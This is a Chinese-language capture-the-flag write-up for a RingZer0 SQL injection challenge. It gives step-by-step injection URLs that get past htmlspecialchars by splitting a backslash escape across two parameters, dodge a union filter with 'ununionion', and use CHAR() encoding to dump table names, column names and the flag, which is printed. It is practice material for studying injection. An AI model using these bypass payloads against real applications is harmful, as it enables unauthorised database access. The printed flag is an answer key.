
problem: http://ringzer0team.com/challenges/38
& （和号） 成为 &amp;
" （双引号） 成为 &quot;
' （单引号） 成为 &#039;
< （小于） 成为 &lt;
> （大于） 成为 &gt;

这个sql注入 值得研究
一步一步试出来。

1.提示debug=true
2.发现使用了 htmlspecialchars()过滤单引号等字符
3.想到使用\结合两个参数，q和s  ===> 参考我之前做的实验:https://github.com/angelwhu/pentesterlab/blob/master/web_for_pentester_II/sqli_2.txt
4.union做了过滤,使用uniunionon 绕过。它将union  replace了。
5.使用mysql的concat方法，绕过单引号注入

测试注入点：
	http://ringzer0team.com/challenges/38?q=11\&s= or 1 -- &debug=true

获取数据库名:
http://ringzer0team.com/challenges/38?q=11\&s= ununionion all select 1,database() -- &debug=true

sqli_quote2

获取表名:
http://ringzer0team.com/challenges/38?q=11\&s= ununionion all select 1,table_name from information_schema.tables where table_schema=CHAR(115, 113, 108, 105, 95, 113, 117, 111, 116, 101, 50) -- &debug=true

Quote of the day: qdyk5
id flag

Quote of the day: quotes
id quote

获取列名：
http://ringzer0team.com/challenges/38?q=-1s\&s= ununionion all select 1,column_name from information_schema.columns where table_schema=CHAR(115, 113, 108, 105, 95, 113, 117, 111, 116, 101, 50) and table_name=CHAR(113, 100, 121, 107, 53) -- &debug=true

Quote of the day: id
Quote of the day: flag

获取flag:
http://ringzer0team.com/challenges/38?q=-1s\&s= ununionion all select 1,flag from qdyk5 -- &debug=true

FLAG-enjlleb337u17K7yLqZ927F3


someone say:
I thinks the mysql query is similar to:
select id,quote from quotes where id=".htmlspecialchars($_GET['q'])." and len(quote) < ".mysql_real_escape_string($_GET['s'])." limit 1;
since htmlspecialchars is used ,quote can be bypassed
